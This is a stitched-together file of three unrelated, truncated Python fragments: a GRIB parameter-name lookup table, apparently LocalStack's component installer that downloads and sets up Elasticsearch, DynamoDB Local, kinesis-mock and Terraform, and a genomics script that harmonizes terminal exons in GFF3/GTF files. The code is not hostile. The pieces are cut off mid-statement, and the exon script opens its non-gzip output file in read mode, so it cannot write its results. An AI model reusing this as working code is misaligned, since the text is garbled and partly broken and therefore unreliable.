if table2Version == 253 and indicatorOfParameter == 41:
return 'Absolute Vorticity in HZ'
if table2Version == 253 and indicatorOfParameter == 40:
return 'Vertical Velocity in m/s'
if table2Version == 253 and indicatorOfParameter == 39:
return 'Vertical Velocity in pa/s'
if table2Version == 253 and indicatorOfParameter == 34:
return 'V wind in m/s'
if table2Version == 253 and indicatorOfParameter == 33:
return 'U wind in m/s'
if table2Version == 253 and indicatorOfParameter == 20:
return 'Visibility in Meters'
if table2Version == 253 and indicatorOfParameter == 17:
return 'Dew point Temperature in K'
if table2Version == 253 and indicatorOfParameter == 16:
return 'Minimum Temperature in Celsius'
if table2Version == 253 and indicatorOfParameter == 15:
return 'Maximum Temperature in Celsius'
if table2Version == 253 and indicatorOfParameter == 13:
return 'Potential temperature'
if table2Version == 253 and indicatorOfParameter == 11:
return 'Temperature in Kelvins'
if table2Version == 253 and indicatorOfParameter == 8:
return 'Height of level in meters'
if table2Version == 253 and indicatorOfParameter == 6:
return 'Geopotential'
if table2Version == 253 and indicatorOfParameter == 2:
return 'Pressure in Pascals'
if table2Version == 253 and indicatorOfParameter == 1:
return 'Pressure in Pascals'
if table2Version == 205 and indicatorOfParameter == 14:
return 'Ice speed in m/s'
if table2Version == 205 and indicatorOfParameter == 13:
return 'Ice Direction in Degrees'
if table2Version == 205 and indicatorOfParameter == 12:
return 'Rafted sea ice concentration'
if table2Version == 205 and indicatorOfParameter == 11:
return 'Rafted sea ice mean thickness'
if table2Version == 205 and indicatorOfParameter == 10:
return 'Ice concentration of ridging'
if table2Version == 205 and indicatorOfParameter == 9:
return 'Ice mean thickness'
if table2Version == 205 and indicatorOfParameter == 8:
return 'Sea ice velocity (V) in m/s'
if table2Version == 205 and indicatorOfParameter == 7:
return 'Sea ice velocity (U) in m/s'
if table2Version == 205 and indicatorOfParameter == 6:
return 'Ice degree of ridging'
if table2Version == 205 and indicatorOfParameter == 5:
return 'Ice maximum thickness'
if table2Version == 205 and indicatorOfParameter == 4:
return 'Ice minimum thickness'
if table2Version == 205 and indicatorOfParameter == 3:
return 'Ice thickness'
if table2Version == 205 and indicatorOfParameter == 2:
return 'Ice concentration'
if table2Version == 205 and indicatorOfParameter == 1:
return 'Sea Temperature in Celsius'
if table2Version == 203 and indicatorOfParameter == 255:
return 'Precipitation form, duplicate parameter for HIMAN purposes'
if table2Version == 203 and indicatorOfParameter == 254:
return 'Convective inhibition, source data is LFC-500 and EL-500'
if table2Version == 203 and indicatorOfParameter == 253:
return 'CAPE, source data is LFC-500 and EL-500, value of CAPE when -40C < T < -10C'
if table2Version == 203 and indicatorOfParameter == 252:
return 'CAPE, source data is LFC-500 and EL-500, value of CAPE between 0 .. 3km'
if table2Version == 203 and indicatorOfParameter == 251:
return 'Convective available potential energy, value of CAPE between 0 .. 3km'
if table2Version == 203 and indicatorOfParameter == 250:
return 'Height of EL in meters, source data is averaged between 0 .. 500m'
if table2Version == 203 and indicatorOfParameter == 249:
return 'Height of LFC in meters, source data is averaged between 0 .. 500m'
if table2Version == 203 and indicatorOfParameter == 248:
return 'Height of LCL in meters, source data is averaged between 0 .. 500m'
if table2Version == 203 and indicatorOfParameter == 247:
return 'Height of EL in hPa, source data is averaged between 0 .. 500m'
if table2Version == 203 and indicatorOfParameter == 246:
return 'Height of LFC in hPa, source data is | |
<gh_stars>0
#!/usr/bin/env python
import glob
import logging
import os
import platform
import re
import shutil
import stat
import sys
import tempfile
import time
from pathlib import Path
import requests
from localstack import config
from localstack.config import is_env_true
from localstack.constants import (
DEFAULT_SERVICE_PORTS,
DYNAMODB_JAR_URL,
ELASTICMQ_JAR_URL,
ELASTICSEARCH_DEFAULT_VERSION,
ELASTICSEARCH_DELETE_MODULES,
ELASTICSEARCH_PLUGIN_LIST,
INSTALL_DIR_INFRA,
KMS_URL_PATTERN,
LOCALSTACK_INFRA_PROCESS,
LOCALSTACK_MAVEN_VERSION,
MODULE_MAIN_PATH,
STS_JAR_URL,
)
from localstack.utils import bootstrap
from localstack.utils.common import (
chmod_r,
download,
get_arch,
get_os,
is_windows,
load_file,
mkdir,
new_tmp_file,
parallelize,
retry,
rm_rf,
run,
safe_run,
save_file,
untar,
unzip,
)
from localstack.utils.docker_utils import DOCKER_CLIENT
LOG = logging.getLogger(__name__)
INSTALL_DIR_NPM = "%s/node_modules" % MODULE_MAIN_PATH
INSTALL_DIR_DDB = "%s/dynamodb" % INSTALL_DIR_INFRA
INSTALL_DIR_KCL = "%s/amazon-kinesis-client" % INSTALL_DIR_INFRA
INSTALL_DIR_STEPFUNCTIONS = "%s/stepfunctions" % INSTALL_DIR_INFRA
INSTALL_DIR_KMS = "%s/kms" % INSTALL_DIR_INFRA
INSTALL_DIR_ELASTICMQ = "%s/elasticmq" % INSTALL_DIR_INFRA
INSTALL_PATH_LOCALSTACK_FAT_JAR = "%s/localstack-utils-fat.jar" % INSTALL_DIR_INFRA
INSTALL_PATH_DDB_JAR = os.path.join(INSTALL_DIR_DDB, "DynamoDBLocal.jar")
INSTALL_PATH_KCL_JAR = os.path.join(INSTALL_DIR_KCL, "aws-java-sdk-sts.jar")
INSTALL_PATH_STEPFUNCTIONS_JAR = os.path.join(INSTALL_DIR_STEPFUNCTIONS, "StepFunctionsLocal.jar")
INSTALL_PATH_KMS_BINARY_PATTERN = os.path.join(INSTALL_DIR_KMS, "local-kms.<arch>.bin")
INSTALL_PATH_ELASTICMQ_JAR = os.path.join(INSTALL_DIR_ELASTICMQ, "elasticmq-server.jar")
INSTALL_PATH_KINESALITE_CLI = os.path.join(INSTALL_DIR_NPM, "kinesalite", "cli.js")
INSTALL_PATH_KINESIS_MOCK = os.path.join(INSTALL_DIR_INFRA, "kinesis-mock")
URL_LOCALSTACK_FAT_JAR = (
"https://repo1.maven.org/maven2/"
+ "cloud/localstack/localstack-utils/{v}/localstack-utils-{v}-fat.jar"
).format(v=LOCALSTACK_MAVEN_VERSION)
MARKER_FILE_LIGHT_VERSION = "%s/.light-version" % INSTALL_DIR_INFRA
IMAGE_NAME_SFN_LOCAL = "amazon/aws-stepfunctions-local"
ARTIFACTS_REPO = "https://github.com/localstack/localstack-artifacts"
SFN_PATCH_CLASS1 = "com/amazonaws/stepfunctions/local/runtime/Config.class"
SFN_PATCH_CLASS2 = (
"com/amazonaws/stepfunctions/local/runtime/executors/task/LambdaTaskStateExecutor.class"
)
SFN_PATCH_CLASS_URL1 = "%s/raw/master/stepfunctions-local-patch/%s" % (
ARTIFACTS_REPO,
SFN_PATCH_CLASS1,
)
SFN_PATCH_CLASS_URL2 = "%s/raw/master/stepfunctions-local-patch/%s" % (
ARTIFACTS_REPO,
SFN_PATCH_CLASS2,
)
# kinesis-mock version
KINESIS_MOCK_VERSION = os.environ.get("KINESIS_MOCK_VERSION") or "0.2.0"
KINESIS_MOCK_RELEASE_URL = (
"https://api.github.com/repos/etspaceman/kinesis-mock/releases/tags/" + KINESIS_MOCK_VERSION
)
# debugpy module
DEBUGPY_MODULE = "debugpy"
DEBUGPY_DEPENDENCIES = ["gcc", "python3-dev", "musl-dev"]
# Target version for javac, to ensure compatibility with earlier JREs
JAVAC_TARGET_VERSION = "1.8"
# SQS backend implementation provider - either "moto" or "elasticmq"
SQS_BACKEND_IMPL = os.environ.get("SQS_PROVIDER") or "moto"
# GO Lambda runtime
GO_RUNTIME_VERSION = "0.4.0"
GO_RUNTIME_DOWNLOAD_URL_TEMPLATE = "https://github.com/localstack/awslamba-go-runtime/releases/download/v{version}/awslamba-go-runtime-{version}-{os}-{arch}.tar.gz"
GO_INSTALL_FOLDER = os.path.join(config.TMP_FOLDER, "awslamba-go-runtime")
GO_LAMBDA_RUNTIME = os.path.join(GO_INSTALL_FOLDER, "aws-lambda-mock")
GO_LAMBDA_MOCKSERVER = os.path.join(GO_INSTALL_FOLDER, "mockserver")
# Terraform (used for tests, whose templates require TF < 0.14.0 )
TERRAFORM_VERSION = "0.13.7"
TERRAFORM_URL_TEMPLATE = (
"https://releases.hashicorp.com/terraform/{version}/terraform_{version}_{os}_{arch}.zip"
)
TERRAFORM_BIN = os.path.join(INSTALL_DIR_INFRA, f"terraform-{TERRAFORM_VERSION}", "terraform")
def get_elasticsearch_install_version(version: str) -> str:
from localstack.services.es import versions
if config.SKIP_INFRA_DOWNLOADS:
return ELASTICSEARCH_DEFAULT_VERSION
return versions.get_install_version(version)
def get_elasticsearch_install_dir(version: str) -> str:
version = get_elasticsearch_install_version(version)
if version == ELASTICSEARCH_DEFAULT_VERSION and not os.path.exists(MARKER_FILE_LIGHT_VERSION):
# install the default version into a subfolder of the code base
install_dir = os.path.join(INSTALL_DIR_INFRA, "elasticsearch")
else:
# put all other versions into the TMP_FOLDER
install_dir = os.path.join(config.TMP_FOLDER, "elasticsearch", version)
return install_dir
def install_elasticsearch(version=None):
from localstack.services.es import versions
if not version:
version = ELASTICSEARCH_DEFAULT_VERSION
version = get_elasticsearch_install_version(version)
install_dir = get_elasticsearch_install_dir(version)
installed_executable = os.path.join(install_dir, "bin", "elasticsearch")
if not os.path.exists(installed_executable):
log_install_msg("Elasticsearch (%s)" % version)
es_url = versions.get_download_url(version)
install_dir_parent = os.path.dirname(install_dir)
mkdir(install_dir_parent)
# download and extract archive
tmp_archive = os.path.join(config.TMP_FOLDER, "localstack.%s" % os.path.basename(es_url))
download_and_extract_with_retry(es_url, tmp_archive, install_dir_parent)
elasticsearch_dir = glob.glob(os.path.join(install_dir_parent, "elasticsearch*"))
if not elasticsearch_dir:
raise Exception("Unable to find Elasticsearch folder in %s" % install_dir_parent)
shutil.move(elasticsearch_dir[0], install_dir)
for dir_name in ("data", "logs", "modules", "plugins", "config/scripts"):
dir_path = os.path.join(install_dir, dir_name)
mkdir(dir_path)
chmod_r(dir_path, 0o777)
# install default plugins
for plugin in ELASTICSEARCH_PLUGIN_LIST:
plugin_binary = os.path.join(install_dir, "bin", "elasticsearch-plugin")
plugin_dir = os.path.join(install_dir, "plugins", plugin)
if not os.path.exists(plugin_dir):
LOG.info("Installing Elasticsearch plugin %s" % plugin)
def try_install():
safe_run([plugin_binary, "install", "-b", plugin])
# We're occasionally seeing javax.net.ssl.SSLHandshakeException -> add download retries
download_attempts = 3
try:
retry(try_install, retries=download_attempts - 1, sleep=2)
except Exception:
LOG.warning(
"Unable to download Elasticsearch plugin '%s' after %s attempts",
plugin,
download_attempts,
)
if not os.environ.get("IGNORE_ES_DOWNLOAD_ERRORS"):
raise
# delete some plugins to free up space
for plugin in ELASTICSEARCH_DELETE_MODULES:
module_dir = os.path.join(install_dir, "modules", plugin)
rm_rf(module_dir)
# disable x-pack-ml plugin (not working on Alpine)
xpack_dir = os.path.join(install_dir, "modules", "x-pack-ml", "platform")
rm_rf(xpack_dir)
# patch JVM options file - replace hardcoded heap size settings
jvm_options_file = os.path.join(install_dir, "config", "jvm.options")
if os.path.exists(jvm_options_file):
jvm_options = load_file(jvm_options_file)
jvm_options_replaced = re.sub(
r"(^-Xm[sx][a-zA-Z0-9\.]+$)", r"# \1", jvm_options, flags=re.MULTILINE
)
if jvm_options != jvm_options_replaced:
save_file(jvm_options_file, jvm_options_replaced)
def install_elasticmq():
if SQS_BACKEND_IMPL != "elasticmq":
return
# TODO remove this function if we stop using ElasticMQ entirely
if not os.path.exists(INSTALL_PATH_ELASTICMQ_JAR):
log_install_msg("ElasticMQ")
mkdir(INSTALL_DIR_ELASTICMQ)
# download archive
tmp_archive = os.path.join(config.TMP_FOLDER, "elasticmq-server.jar")
if not os.path.exists(tmp_archive):
download(ELASTICMQ_JAR_URL, tmp_archive)
shutil.copy(tmp_archive, INSTALL_DIR_ELASTICMQ)
def install_kinesis():
if config.KINESIS_PROVIDER == "kinesalite":
return install_kinesalite()
elif config.KINESIS_PROVIDER == "kinesis-mock":
return install_kinesis_mock()
else:
raise ValueError("unknown kinesis provider %s" % config.KINESIS_PROVIDER)
def install_kinesalite():
if not os.path.exists(INSTALL_PATH_KINESALITE_CLI):
log_install_msg("Kinesis")
run('cd "%s" && npm install' % MODULE_MAIN_PATH)
def install_kinesis_mock():
target_dir = INSTALL_PATH_KINESIS_MOCK
machine = platform.machine().lower()
system = platform.system().lower()
version = platform.version().lower()
is_probably_m1 = system == "darwin" and ("arm64" in version or "arm32" in version)
LOG.debug("getting kinesis-mock for %s %s", system, machine)
if is_env_true("KINESIS_MOCK_FORCE_JAVA"):
# sometimes the static binaries may have problems, and we want to fal back to Java
bin_file = "kinesis-mock.jar"
elif (machine == "x86_64" or machine == "amd64") and not is_probably_m1:
if system == "windows":
bin_file = "kinesis-mock-mostly-static.exe"
elif system == "linux":
bin_file = "kinesis-mock-linux-amd64-static"
elif system == "darwin":
bin_file = "kinesis-mock-macos-amd64-dynamic"
else:
bin_file = "kinesis-mock.jar"
else:
bin_file = "kinesis-mock.jar"
bin_file_path = os.path.join(target_dir, bin_file)
if os.path.exists(bin_file_path):
LOG.debug("kinesis-mock found at %s", bin_file_path)
return bin_file_path
response = requests.get(KINESIS_MOCK_RELEASE_URL)
if not response.ok:
raise ValueError(
"Could not get list of releases from %s: %s" % (KINESIS_MOCK_RELEASE_URL, response.text)
)
github_release = response.json()
download_url = None
for asset in github_release.get("assets", []):
# find the correct binary in the release
if asset["name"] == bin_file:
download_url = asset["browser_download_url"]
break
if download_url is None:
raise ValueError(
"could not find required binary %s in release %s" % (bin_file, KINESIS_MOCK_RELEASE_URL)
)
mkdir(target_dir)
LOG.info("downloading kinesis-mock binary from %s", download_url)
download(download_url, bin_file_path)
chmod_r(bin_file_path, 0o777)
return bin_file_path
def install_local_kms():
local_arch = get_os()
binary_path = INSTALL_PATH_KMS_BINARY_PATTERN.replace("<arch>", local_arch)
if not os.path.exists(binary_path):
log_install_msg("KMS")
mkdir(INSTALL_DIR_KMS)
# TODO ARM download platform specific binary
kms_url = KMS_URL_PATTERN.replace("<arch>", local_arch)
download(kms_url, binary_path)
chmod_r(binary_path, 0o777)
def install_stepfunctions_local():
if not os.path.exists(INSTALL_PATH_STEPFUNCTIONS_JAR):
# pull the JAR file from the Docker image, which is more up-to-date than the downloadable JAR file
# TODO: works only when running on the host, outside of Docker -> add a fallback if running in Docker?
log_install_msg("Step Functions")
mkdir(INSTALL_DIR_STEPFUNCTIONS)
DOCKER_CLIENT.pull_image(IMAGE_NAME_SFN_LOCAL)
docker_name = "tmp-ls-sfn"
DOCKER_CLIENT.run_container(
IMAGE_NAME_SFN_LOCAL,
remove=True,
entrypoint="",
name=docker_name,
detach=True,
command=["sleep", "15"],
)
time.sleep(5)
DOCKER_CLIENT.copy_from_container(
docker_name, local_path=INSTALL_DIR_INFRA, container_path="/home/stepfunctionslocal/"
)
path = Path(f"{INSTALL_DIR_INFRA}/stepfunctionslocal/")
for file in path.glob("*.jar"):
file.rename(Path(INSTALL_DIR_STEPFUNCTIONS) / file.name)
rm_rf("%s/stepfunctionslocal" % INSTALL_DIR_INFRA)
# apply patches
for patch_class, patch_url in (
(SFN_PATCH_CLASS1, SFN_PATCH_CLASS_URL1),
(SFN_PATCH_CLASS2, SFN_PATCH_CLASS_URL2),
):
patch_class_file = os.path.join(INSTALL_DIR_STEPFUNCTIONS, patch_class)
if not os.path.exists(patch_class_file):
download(patch_url, patch_class_file)
cmd = 'cd "%s"; zip %s %s' % (
INSTALL_DIR_STEPFUNCTIONS,
INSTALL_PATH_STEPFUNCTIONS_JAR,
patch_class,
)
run(cmd)
def install_dynamodb_local():
if not os.path.exists(INSTALL_PATH_DDB_JAR):
log_install_msg("DynamoDB")
# download and extract archive
tmp_archive = os.path.join(tempfile.gettempdir(), "localstack.ddb.zip")
download_and_extract_with_retry(DYNAMODB_JAR_URL, tmp_archive, INSTALL_DIR_DDB)
# fix logging configuration for DynamoDBLocal
log4j2_config = """<Configuration status="WARN">
<Appenders>
<Console name="Console" target="SYSTEM_OUT">
<PatternLayout pattern="%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n"/>
</Console>
</Appenders>
<Loggers>
<Root level="WARN"><AppenderRef ref="Console"/></Root>
</Loggers>
</Configuration>"""
log4j2_file = os.path.join(INSTALL_DIR_DDB, "log4j2.xml")
save_file(log4j2_file, log4j2_config)
run('cd "%s" && zip -u DynamoDBLocal.jar log4j2.xml || true' % INSTALL_DIR_DDB)
def install_amazon_kinesis_client_libs():
# install KCL/STS JAR files
if not os.path.exists(INSTALL_PATH_KCL_JAR):
mkdir(INSTALL_DIR_KCL)
tmp_archive = os.path.join(tempfile.gettempdir(), "aws-java-sdk-sts.jar")
if not os.path.exists(tmp_archive):
download(STS_JAR_URL, tmp_archive)
shutil.copy(tmp_archive, INSTALL_DIR_KCL)
# Compile Java files
from localstack.utils.kinesis import kclipy_helper
classpath = kclipy_helper.get_kcl_classpath()
if is_windows():
classpath = re.sub(r":([^\\])", r";\1", classpath)
java_files = "%s/utils/kinesis/java/cloud/localstack/*.java" % MODULE_MAIN_PATH
class_files = "%s/utils/kinesis/java/cloud/localstack/*.class" % MODULE_MAIN_PATH
if not glob.glob(class_files):
run(
'javac -source %s -target %s -cp "%s" %s'
% (JAVAC_TARGET_VERSION, JAVAC_TARGET_VERSION, classpath, java_files)
)
def install_lambda_java_libs():
# install LocalStack "fat" JAR file (contains all dependencies)
if not os.path.exists(INSTALL_PATH_LOCALSTACK_FAT_JAR):
log_install_msg("LocalStack Java libraries", verbatim=True)
download(URL_LOCALSTACK_FAT_JAR, INSTALL_PATH_LOCALSTACK_FAT_JAR)
def install_go_lambda_runtime():
if os.path.isfile(GO_LAMBDA_RUNTIME):
return
log_install_msg("Installing golang runtime")
system = platform.system().lower()
arch = get_arch()
if system not in ["linux"]:
raise ValueError("unsupported os %s for awslambda-go-runtime" % system)
if arch not in ["amd64", "arm32"]:
raise ValueError("unsupported arch %s for awslambda-go-runtime" % arch)
url = GO_RUNTIME_DOWNLOAD_URL_TEMPLATE.format(
version=GO_RUNTIME_VERSION,
os=system,
arch=arch,
)
download_and_extract(url, GO_INSTALL_FOLDER)
st = os.stat(GO_LAMBDA_RUNTIME)
os.chmod(GO_LAMBDA_RUNTIME, st.st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
st = os.stat(GO_LAMBDA_MOCKSERVER)
os.chmod(GO_LAMBDA_MOCKSERVER, st.st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
def install_cloudformation_libs():
from localstack.services.cloudformation import deployment_utils
# trigger download of CF module file
deployment_utils.get_cfn_response_mod_file()
def install_terraform() -> str:
if os.path.isfile(TERRAFORM_BIN):
return TERRAFORM_BIN
log_install_msg(f"Installing terraform {TERRAFORM_VERSION}")
system = platform.system().lower()
arch = get_arch()
url = TERRAFORM_URL_TEMPLATE.format(version=TERRAFORM_VERSION, os=system, arch=arch)
download_and_extract(url, os.path.dirname(TERRAFORM_BIN))
chmod_r(TERRAFORM_BIN, 0o777)
return TERRAFORM_BIN
def get_terraform_binary() -> str:
if not os.path.isfile(TERRAFORM_BIN):
install_terraform()
return TERRAFORM_BIN
def install_component(name):
installers = {
"cloudformation": install_cloudformation_libs,
"dynamodb": install_dynamodb_local,
"kinesis": install_kinesis,
"kms": install_local_kms,
"sqs": install_elasticmq,
"stepfunctions": install_stepfunctions_local,
}
installer = installers.get(name)
if installer:
installer()
def install_components(names):
parallelize(install_component, names)
install_lambda_java_libs()
def install_all_components():
# load plugins
os.environ[LOCALSTACK_INFRA_PROCESS] = "1"
bootstrap.load_plugins()
# install all components
install_components(DEFAULT_SERVICE_PORTS.keys())
def install_debugpy_and_dependencies():
try:
import debugpy
assert debugpy
logging.debug("Debugpy module already Installed")
except ModuleNotFoundError:
logging.debug("Installing Debugpy module")
import pip
if hasattr(pip, "main"):
pip.main(["install", DEBUGPY_MODULE])
else:
pip._internal.main(["install", DEBUGPY_MODULE])
# -----------------
# HELPER FUNCTIONS
# -----------------
def log_install_msg(component, verbatim=False):
component = component if verbatim else "local %s server" % component
LOG.info("Downloading and installing %s. This may take some time." % component)
def download_and_extract(archive_url, target_dir, retries=0, sleep=3, tmp_archive=None):
mkdir(target_dir)
if tmp_archive:
_, ext = os.path.splitext(tmp_archive)
else:
_, | |
<reponame>agladstein/RNA-Seq-in-the-Cloud
#!/usr/bin/env python
import csv
import gzip
import re
import sys
import os
from collections import defaultdict, OrderedDict
import argparse
# See http://stackoverflow.com/questions/14207708/ioerror-errno-32-broken-pipe-python
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE, SIG_DFL)
parser = argparse.ArgumentParser(description ="""This script parses input
gff/gtf file and harmonizes the equivalent terminal exons
for each gene """)
parser.add_argument('-i', '--infile', help="input file; required")
parser.add_argument('-o', '--outfile', help="output file; required")
parser.add_argument('-f', '--format', help="input file format `gff3` or `gtf`; \
default is gtf")
parser.add_argument('--fancy_refseq_stuff', help="do fancy refseq stuff to \
extend only up to the longest known RefSeq on the 5' end and to the \
longest 'any' RefSeq on the 3' end", action = 'store_true')
parser.add_argument('-z', '--gzip', help="input and ouput files are gzip \
compressed", action = 'store_true')
args = parser.parse_args()
if not all([args.infile, args.outfile]):
print("You must provide input and output files", file = sys.stderr)
sys.exit()
else:
input_file = args.infile
output_file = args.outfile
if args.format:
input_format = args.format
if not input_format in ['gff3', 'gtf']:
print("Input file format can only be `gff3` or `gtf`", file = sys.stderr)
sys.exit()
else:
input_format = 'gtf'
if args.fancy_refseq_stuff:
fancy_refseq_stuff = True
else:
fancy_refseq_stuff = False
def get_gff3_exons(input_file):
""" returns the first exon for each transcript in a gff3 file;
requires gff3 file as input """
if args.gzip:
f = gzip.open(input_file, 'rt')
else:
f = open(input_file, 'rt')
def process_attribs(attribs):
new_attribs = {}
attribs = list(filter(None, attribs.split(';')))
for attrib in attribs:
k, v = attrib.split('=')
if k == 'Dbxref':
xrefs = v.split(',')
for xref in xrefs:
terms = xref.split(':')
new_attribs[terms[-2]] = terms[-1]
else:
new_attribs[k] = v
return new_attribs
tbl = csv.reader(f, delimiter = '\t')
parent_id_dict = {}
first_exons_dict = {}
last_exons_dict = {}
for line in tbl:
if not line[0].startswith('#'):
[
chrom, feat_source, feat_type,
start, stop, score,
strand, phase, attribs
] = line
start, stop = int(start), int(stop)
if feat_type == 'exon' and stop > start:
new_attribs = process_attribs(attribs)
gene_id = new_attribs['GeneID']
if 'transcript_id' in attribs:
tx = new_attribs['transcript_id']
else:
tx = new_attribs['Parent']
gene_info = (chrom, strand, gene_id)
parent_id_dict[new_attribs['Parent']] = (
chrom, strand, gene_id, tx)
if gene_info not in first_exons_dict:
first_exons_dict[gene_info] = {tx : [start, stop]}
last_exons_dict[gene_info] = {tx : [start, stop]}
elif tx not in first_exons_dict[gene_info]:
first_exons_dict[gene_info][tx] = [start, stop]
last_exons_dict[gene_info][tx] = [start, stop]
elif strand == '+':
if start < first_exons_dict[gene_info][tx][0]:
first_exons_dict[gene_info][tx] = [start, stop]
if start > last_exons_dict[gene_info][tx][0]:
last_exons_dict[gene_info][tx] = [start, stop]
elif strand == '-':
if start > first_exons_dict[gene_info][tx][0]:
first_exons_dict[gene_info][tx] = [start, stop]
if start < last_exons_dict[gene_info][tx][0]:
last_exons_dict[gene_info][tx] = [start, stop]
f.close()
return first_exons_dict, last_exons_dict, parent_id_dict
def get_gtf_exons(input_file):
""" returns first exon for each transcript in a gtf file;
requires gtf file as input
process_attribs notes (mostly for my future self):
1. there can be more attribs like db_xref that are present >1 time; this
script ends up keeping only the one that appears in the end
2. 'description' attrib will include only the first word
3. used OrderedDict b/c list->set->list conversion may lose order and we
will end up with GeneID:123 in one case and 123:GeneID in another
"""
if args.gzip:
f = gzip.open(input_file, 'rt')
else:
f = open(input_file, 'rt')
def process_attribs(attribs):
new_attribs = {}
attribs = filter(None, attribs.rstrip(' ').split(';'))
for attrib in attribs:
attrib = attrib.lstrip(' ').split(' ')
if attrib[0] == 'db_xref':
attrib = OrderedDict.fromkeys(attrib[1].strip('"').split(':'))
attrib = list(attrib.keys())
new_attribs[attrib[0]] = attrib[1].strip('"')
return new_attribs
tbl = csv.reader(f, delimiter = '\t')
first_exons_dict = {}
last_exons_dict = {}
for line in tbl:
if not line[0].startswith('#'):
[
chrom, feat_source, feat_type,
start, stop, score,
strand, phase, attribs
] = line
start, stop = int(start), int(stop)
if feat_type == 'exon' and stop > start:
new_attribs = process_attribs(attribs)
gene_id = new_attribs.get('GeneID', new_attribs['gene_id'])
tx = new_attribs['transcript_id']
gene_info = (chrom, strand, gene_id)
if gene_info not in first_exons_dict:
first_exons_dict[gene_info] = {tx : [start, stop]}
last_exons_dict[gene_info] = {tx : [start, stop]}
elif tx not in first_exons_dict[gene_info]:
first_exons_dict[gene_info][tx] = [start, stop]
last_exons_dict[gene_info][tx] = [start, stop]
elif strand == '+':
if start < first_exons_dict[gene_info][tx][0]:
first_exons_dict[gene_info][tx] = [start, stop]
if start > last_exons_dict[gene_info][tx][0]:
last_exons_dict[gene_info][tx] = [start, stop]
elif strand == '-':
if start > first_exons_dict[gene_info][tx][0]:
first_exons_dict[gene_info][tx] = [start, stop]
if start < last_exons_dict[gene_info][tx][0]:
last_exons_dict[gene_info][tx] = [start, stop]
f.close()
return first_exons_dict, last_exons_dict
def create_start_extensions_list(first_exons_dict, fancy_refseq_stuff):
start_extensions = {}
for gene_info, all_txs in first_exons_dict.items():
chrom, strand, gene_id = gene_info
longest_first_exons = {}
if fancy_refseq_stuff:
if strand == '+':
for tx, first_exon in sorted(all_txs.items()):
i = longest_first_exons.get(first_exon[1], None)
if tx.startswith('N'):
if i is None or first_exon[0] < i :
longest_first_exons[first_exon[1]] = first_exon[0]
elif first_exon[1] not in longest_first_exons:
if i is None or first_exon[0] < i :
longest_first_exons[first_exon[1]] = first_exon[0]
elif strand == '-':
for tx, first_exon in sorted(all_txs.items()):
i = longest_first_exons.get(first_exon[0], None)
if tx.startswith('N'):
if i is None or first_exon[1] > i:
longest_first_exons[first_exon[0]] = first_exon[1]
elif first_exon[0] not in longest_first_exons:
if i is None or first_exon[1] > i:
longest_first_exons[first_exon[0]] = first_exon[1]
else:
first_exons_set = set()
for tx, first_exon in sorted(all_txs.items()):
first_exons_set.add(tuple(first_exon))
first_exons_set = sorted(list(first_exons_set))
if strand == '+':
for first_exon in first_exons_set:
if first_exon[1] not in longest_first_exons:
longest_first_exons[first_exon[1]] = first_exon[0]
elif strand == '-':
for first_exon in first_exons_set:
longest_first_exons[first_exon[0]] = first_exon[1]
for tx, first_exon in all_txs.items():
tx_info = (chrom, strand, gene_id, tx)
if strand == '+':
if longest_first_exons[first_exon[1]] == first_exon[0]:
continue
else:
start_extensions[tx_info] = [
first_exon,
[longest_first_exons[first_exon[1]],
first_exon[1]]]
elif strand == '-':
if longest_first_exons[first_exon[0]] == first_exon[1]:
continue
else:
start_extensions[tx_info] = [
first_exon,
[first_exon[0],
longest_first_exons[first_exon[0]]]]
return start_extensions
def create_end_extensions_list(last_exons_dict):
end_extensions = {}
for gene_info, all_txs in last_exons_dict.items():
chrom, strand, gene_id = gene_info
last_exons_set = set()
for tx, last_exon in all_txs.items():
last_exons_set.add(tuple(last_exon))
longest_last_exons = {}
last_exons_set = sorted(list(last_exons_set))
if strand == '+':
for last_exon in last_exons_set:
longest_last_exons[last_exon[0]] = last_exon[1]
elif strand == '-':
for last_exon in last_exons_set:
if last_exon[1] not in longest_last_exons:
longest_last_exons[last_exon[1]] = last_exon[0]
for tx, last_exon in all_txs.items():
tx_info = (chrom, strand, gene_id, tx)
if strand == '+':
if longest_last_exons[last_exon[0]] == last_exon[1]:
continue
else:
end_extensions[tx_info] = [
last_exon,
[last_exon[0],
longest_last_exons[last_exon[0]]]]
elif strand == '-':
if longest_last_exons[last_exon[1]] == last_exon[0]:
continue
else:
end_extensions[tx_info] = [
last_exon,
[longest_last_exons[last_exon[1]],
last_exon[1]]]
return end_extensions
def write_updated_gff3_file(input_file, output_file, start_extensions, end_extensions, parent_id_dict):
if args.gzip:
fi = gzip.open(input_file, 'rt')
fo = gzip.open(output_file, 'wt')
else:
fi = open(input_file, 'rt')
fo = open(output_file, 'rt')
def process_attribs(attribs):
new_attribs = {}
split_attribs = list(filter(None, attribs.split(';')))
for attrib in split_attribs:
k, v = attrib.split('=')
if k == 'Dbxref':
xrefs = v.split(',')
for xref in xrefs:
terms = xref.split(':')
new_attribs[terms[-2]] = terms[-1]
else:
new_attribs[k] = v
return new_attribs
tblin = csv.reader(fi, delimiter = '\t')
tblout = csv.writer(
fo,
delimiter = '\t',
lineterminator = os.linesep)
for line in tblin:
if not line[0].startswith('#'):
[
chrom, feat_source, feat_type,
start, stop, score,
strand, phase, attribs
] = line
start, stop = int(start), int(stop)
new_attribs = process_attribs(attribs)
if feat_type == 'exon' and stop > start:
gene_id = new_attribs['GeneID']
if 'transcript_id' in attribs:
tx = new_attribs['transcript_id']
else:
tx = new_attribs['Parent']
gene_info = (chrom, strand, gene_id, tx)
if (gene_info in start_extensions
and start_extensions[gene_info][0] == [start, stop]):
line[3], line[4] = start_extensions[gene_info][1]
elif (gene_info in end_extensions
and end_extensions[gene_info][0] == [start, stop]):
line[3], line[4] = end_extensions[gene_info][1]
else:
gff3_id = new_attribs.get('ID', 'No_ID_present')
if (gff3_id in parent_id_dict
and parent_id_dict[gff3_id] in start_extensions):
gene_info = parent_id_dict[gff3_id]
if (strand == '+'
and start_extensions[gene_info][0][0] == start):
line[3] = start_extensions[gene_info][1][0]
line[8] = line[8].rstrip() + ';tag=extended_start'
elif (strand == '-'
and start_extensions[gene_info][0][1] == stop):
line[4] = start_extensions[gene_info][1][1]
line[8] = line[8].rstrip() + ';tag=extended_start'
if (gff3_id in parent_id_dict
and parent_id_dict[gff3_id] in end_extensions):
gene_info = parent_id_dict[gff3_id]
if (strand == '+'
